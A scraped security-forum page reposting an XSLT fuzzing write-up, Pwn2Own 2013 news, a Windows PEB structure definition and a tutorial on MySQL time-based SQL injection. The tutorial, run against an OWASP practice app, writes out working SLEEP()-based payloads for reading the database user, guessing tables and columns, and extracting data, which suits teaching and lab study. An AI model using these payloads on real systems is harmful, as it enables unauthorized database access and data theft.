MD5/SHA1 - rohitab.com - Forums
  18. [h=2]lundi 25 février 2013, 17:26:37 (UTC+0100)[/h] [h=3]Mutation-based fuzzing of XSLT engines[/h] Intro I did in 2011 some research about vulnerabilities caused by the abuse of dangerous features provided by XSLT engines. This leads to a few vulnerabilities (mainly access to the file system or code execution) in Webkit, xmlsec, SharePoint, Liferay, MoinMoin, PostgreSQL, ... In 2012, I decided to look for memory corruption bugs and did some mutation-based (aka "dumb") fuzzing of XSLT engines. This article presents more than 10 different PoC affecting Firefox, Adobe Reader, Chrome, Internet Explorer and Intel SOA. Most of these bugs have been patched by their respective vendors. The goal of this blog-post is mainly to show to XML newbies what pathological XSLT looks like. Of course, exploit writers could find some useful information too. When fuzzing XSLT engines by providing malformed XSLT stylesheets, three distinct components (at least) are tested: - the XML parser itself, as a XSLT stylesheet is a XML document - the XSLT interpreter, which need to compile and execute the provided code - the XPath engine, because attributes like "match" and "select" use it to reference data Given that dumb fuzzing is used, the generation of test cases is quite simple. Radamsa generates packs of 100 stylesheets from a pool of 7000 grabbed here and there. A much improved version (using among others grammar-based generation) is on the way and already gives promising results ;-) PoC were minimized manually, given that the template structure and execution flow of XSLT doesn't work well with minimizers like tmin or delta. Intel SOA Expressway XSLT 2.0 Processor Intel was proposing an evaluation version of their XSLT 2.0 engine. It's quite rare to encounter a C-based XSLT engine supporting version 2.0, so it was added to the testbed even if it has minor real-world relevance. In my opinion, the first bug should have been detected during functionnal testing. When idiv (available in XPath 2.0) is used with 1 as the denominator, a optimization/shortcut is used. But it seems that someone has confused the address and the value of the corresponding numerator variable. Please note that the value of the numerator corresponds to 0x41424344 in hex. Articol: http://www.agarri.fr/blog/index.html
  19. Cateva idei: https://docs.google.com/file/d/0B46UFFNOX3K7bl8zWmFvRGVlamM/view?pli=1&sle=true
  20. E de cacat. Linux, Android, iOS, MAC OS X Firefox OS, Chrome OS te pun sa selectezi browseru? Eu poate vreau Internet Explorer p Linux, cu Wine, vreau sa ma puna sa aleg!
  21. Nu isi merita banii, nimic special...
  22. La cat de complicate sunt lucrurile si banii sunt pe masura. Conteaza insa si cum colaboreaza companiile. CEO-ul de la VUPEN (cei mai smecheri in domeniul "exploit development" dupa parerea mea) a declarat ca Microsoft nu mai vrea sa le cumpere 0day-urile (cel din IE10 pe Win8) si in concluzie acestea vor ajunge la guverne. Ceea cea nu e deloc ok.
  23. [h=1]Major Browsers, Java Hacked on the First Day of Pwn2Own 2013[/h]March 7th, 2013, 14:04 GMT · By Eduard Kovacs Considering the large amounts of money being offered at Pwn2Own 2013, we shouldn’t be surprised that most of the web browsers have been hacked on the first day of the competition, held these days in Canada as part of the CanSecWest conference. So far, Firefox, Internet Explorer 10, Java and Chrome have been broken by the contestants. French security firm VUPEN announced breaking Internet Explorer 10 on Windows 8, Firefox 19 on Windows 7, and Java. “We've pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass,” VUPEN wrote on Twitter. “We've pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP,” the company said two hours later. It appears they hacked Java by leveraging a “unique heap overflow as a memory leak to bypass ASLR and as a code execution.” “ALL our 0days & techniques used at #Pwn2own have been reported to affected software vendors to allow them issue patches and protect users,” VUPEN said. Experts from MWR Labs have managed to demonstrate a full sandbox bypass exploit against the latest stable version of Chrome. “By visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process,” MWR Labs representatives wrote. “We also used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges.” Java was also “pwned” by Josh Drake of Accuvant Labs and James Forshaw of Contextis. Currently, VUPEN is working on breaking Flash, Pham Toan is attempting to hack Internet Explorer 10, and the famous George Hotz is taking a crack at Adobe Reader. Sursa: Major Browsers, Java Hacked on the First Day of Pwn2Own 2013 - Softpedia
  24. [h=2]Evolution of Process Environment Block (PEB)[/h]March 2, 2013 / ReWolf Over one year ago I’ve published unified definition of PEB for x86 and x64 Windows (PEB32 and PEB64 in one definition). It was based on PEB taken from Windows 7 NTDLL symbols, but I was pretty confident that it should work on other versions of Windows as well. Recently someone left a comment under mentioned post: “Good, but its only for Windows 7?. It made me curious if it is really ‘only for Win7?. I was expecting that there might be some small differences between some field names, or maybe some new fields added at the end, but the overall structure should be the same. I’ve no other choice but to check it myself. I’ve collected 108 different ntdll.pdb/wntdll.pdb files from various versions of Windows and dumped _PEB structure from them (Dia2Dump ftw!). Here are some statistics: _PEB was defined in 80 different PDBs (53 x86 PEBs and 27 x64 PEBs) There was 11 unique PEBs for x86, and 8 unique PEBs for x64 (those numbers doesn’t sum up, as starting from Windows 2003 SP1 there is always match between x86 and x64 version) The total number of collected different _PEB definitions is equal to 11 I’ve put all the collected informations into nice table (click the picture to open PDF): PEB Evolution PDF Left column of the table represents x86 offset, right column is x64 offset, green fields are supposed to be compatible across all windows versions starting from XP without any SP and ending at Windows 8 RTM, red (pink?, rose?) fields should be used only after careful verification if they’re working on a target system. At the top of the table, there is row called NTDLL TimeStamp, it is not timestamp from the PE header but from Debug Directory (IMAGE_DIRECTORY_ENTRY_DEBUG, LordPE can parse this structure). I’m using this timestamp as an unique identifier for NTDLL version, this timestamp is also stored in PDB files. Now I can answer initial question: “Is my previous PEB32/PEB64 definition wrong ?” Yes and No. Yes, because it contains various fields specific for Windows 7 thus it can be considered as wrong. No, because most of fields are exactly the same across all Windows versions, especially those fields that are usually used in third party software. To satisfy everyone, I’ve prepared another version of PEB32/PEB64 definition: #pragma pack(push) #pragma pack(1) template <class T> struct LIST_ENTRY_T { T Flink; T Blink; }; template <class T> struct UNICODE_STRING_T { union { struct { WORD Length; WORD MaximumLength; }; T dummy; }; T _Buffer; }; template <class T, class NGF, int A> struct _PEB_T { union { struct { BYTE InheritedAddressSpace; BYTE ReadImageFileExecOptions; BYTE BeingDebugged; BYTE _SYSTEM_DEPENDENT_01; }; T dummy01; }; T Mutant; T ImageBaseAddress; T Ldr; T ProcessParameters; T SubSystemData; T ProcessHeap; T FastPebLock; T _SYSTEM_DEPENDENT_02; T _SYSTEM_DEPENDENT_03; T _SYSTEM_DEPENDENT_04; union { T KernelCallbackTable; T UserSharedInfoPtr; }; DWORD SystemReserved; DWORD _SYSTEM_DEPENDENT_05; T _SYSTEM_DEPENDENT_06; T TlsExpansionCounter; T TlsBitmap; DWORD TlsBitmapBits[2]; T ReadOnlySharedMemoryBase; T _SYSTEM_DEPENDENT_07; T ReadOnlyStaticServerData; T AnsiCodePageData; T OemCodePageData; T UnicodeCaseTableData; DWORD NumberOfProcessors; union { DWORD NtGlobalFlag; NGF dummy02; }; LARGE_INTEGER CriticalSectionTimeout; T HeapSegmentReserve; T HeapSegmentCommit; T HeapDeCommitTotalFreeThreshold; T HeapDeCommitFreeBlockThreshold; DWORD NumberOfHeaps; DWORD MaximumNumberOfHeaps; T ProcessHeaps; T GdiSharedHandleTable; T ProcessStarterHelper; T GdiDCAttributeList; T LoaderLock; DWORD OSMajorVersion; DWORD OSMinorVersion; WORD OSBuildNumber; WORD OSCSDVersion; DWORD OSPlatformId; DWORD ImageSubsystem; DWORD ImageSubsystemMajorVersion; T ImageSubsystemMinorVersion; union { T ImageProcessAffinityMask; T ActiveProcessAffinityMask; }; T GdiHandleBuffer[A]; T PostProcessInitRoutine; T TlsExpansionBitmap; DWORD TlsExpansionBitmapBits[32]; T SessionId; ULARGE_INTEGER AppCompatFlags; ULARGE_INTEGER AppCompatFlagsUser; T pShimData; T AppCompatInfo; UNICODE_STRING_T<T> CSDVersion; T ActivationContextData; T ProcessAssemblyStorageMap; T SystemDefaultActivationContextData; T SystemAssemblyStorageMap; T MinimumStackCommit; }; typedef _PEB_T<DWORD, DWORD64, 34> PEB32; typedef _PEB_T<DWORD64, DWORD, 30> PEB64; #pragma pack(pop) Above version is system independent as all fields that are changing across OS versions are marked as _SYSTEM_DEPENDENT_xx. I’ve also removed all fields from the end that were added after Widnows XP. Sursa: Evolution of Process Environment Block (PEB)
  25. [h=3]MySQL Injection Time Based[/h]We have already written a couple of posts on SQL Injection techniques, Such as "SQL Injection Union Based", "Blind SQL Injection" and last but not least "Common problems faced while performing SQL Injection", However how could the series miss the "Time based SQL injection" technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to @yappare. Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi Time-Based Blind SQL Injection with Heavy Queries and of course the greatest cheatsheet, Cheat Sheets | pentestmonkey OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine. Tested on Peruggia application. Lets gO! Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do. But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function. each DBMS have different type of function to use,but the steps usually quite similar. In MSSQL we use WAITFOR DELAY In POSTGRES we use PG_DELAY() and so on..do check it on pentestmonkey cheatsheet Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not. Test it using this command pic_id=13 and sleep(5)-- As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well. Lets proceed to check the current user. Here's the command the we are going to use pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)-- Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters. From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why? Because the 1st character of the current user start with 'p'.. not 'a' or 'h' Then you can proceed to check for its 2nd character and so on. pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)-- pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)-- so on.. So go on with table_name guessing. pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1) The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then. While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist! How about guessing the column_name?Its easy. pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1) See the image above?Still need any explanation? I bet you guys already understand it! Get the data mode! pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)-- So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds. And then proceed to test the 2nd,3rd char and so on.. The image shown that the username=admin..so is it correct?lets double check it Yeahhh.its correct. That's all for now! Thanks, @yappare Sursa: MySQL Injection Time Based | Learn How To Hack - Ethical Hacking and security tips
×
×
  • Create New...